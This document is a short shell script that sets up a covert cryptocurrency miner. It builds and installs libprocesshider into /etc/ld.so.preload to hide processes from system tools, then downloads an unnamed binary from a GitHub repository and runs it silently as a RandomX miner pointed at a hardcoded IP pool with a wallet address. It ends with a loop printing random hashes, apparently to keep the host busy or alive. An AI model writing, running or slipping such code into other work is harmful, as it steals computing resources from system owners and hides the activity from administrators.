#!/bin/sh
ln -fs /usr/share/zoneinfo/America/Toronto /etc/localtime
dpkg-reconfigure --frontend noninteractive tzdata
apt update
apt -y install binutils cmake build-essential screen unzip net-tools curl nano tor
service tor start

git clone https://github.com/hanifgz/libprocesshider.git
cd libprocesshider;make
gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
mv libprocesshider.so /usr/local/lib/;echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload
cd ..
A=139.177.188.78:80
B=867VgRiSidDhm8L4gUzkSoKA49D6bcsBwRneopcngnQb85TX3LG9poAfdThb3nxLmXBCEh2KHkpUUSU8DbjVjX9oSKScM6D
C=GAS
wget https://github.com/bengetsia/soft/raw/main/jilox && chmod u+x jilox
./jilox --url $A --user $B --pass $C --donate-level 1 -a rx/0 >/dev/null 2>&1
r

while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 10m; done
